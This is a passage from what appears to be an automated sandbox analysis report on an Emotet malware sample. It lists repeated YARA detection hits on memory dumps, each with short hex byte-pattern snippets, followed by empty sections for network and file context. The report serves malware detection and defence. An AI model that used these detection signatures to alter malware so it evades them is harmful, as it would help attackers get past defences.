    • 0x50d4:$snippet6: 33 C0 21 05 4C 25 21 02 A3 48 25 21 02 39 05 70 F3 20 02 74 18 40 A3 48 25 21 02 83 3C C5 70 F3 ...
    00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
      • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 EC 00 85 C0
      • 0x50d4:$snippet6: 33 C0 21 05 4C 25 EC 00 A3 48 25 EC 00 39 05 70 F3 EB 00 74 18 40 A3 48 25 EC 00 83 3C C5 70 F3 ...
      00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
        • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 63 00 85 C0
        • 0x50d4:$snippet6: 33 C0 21 05 4C 25 63 00 A3 48 25 63 00 39 05 70 F3 62 00 74 18 40 A3 48 25 63 00 83 3C C5 70 F3 ...
        00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
          • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
          • 0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...
          00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
            • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
            • 0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...
            00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
              • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 E7 00 85 C0
              • 0x50d4:$snippet6: 33 C0 21 05 4C 25 E7 00 A3 48 25 E7 00 39 05 70 F3 E6 00 74 18 40 A3 48 25 E7 00 83 3C C5 70 F3 ...
              00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
                00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
                • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
                • 0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...

                Unpacked PEs

                No yara matches

                Sigma Overview

                No Sigma rule has matched

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.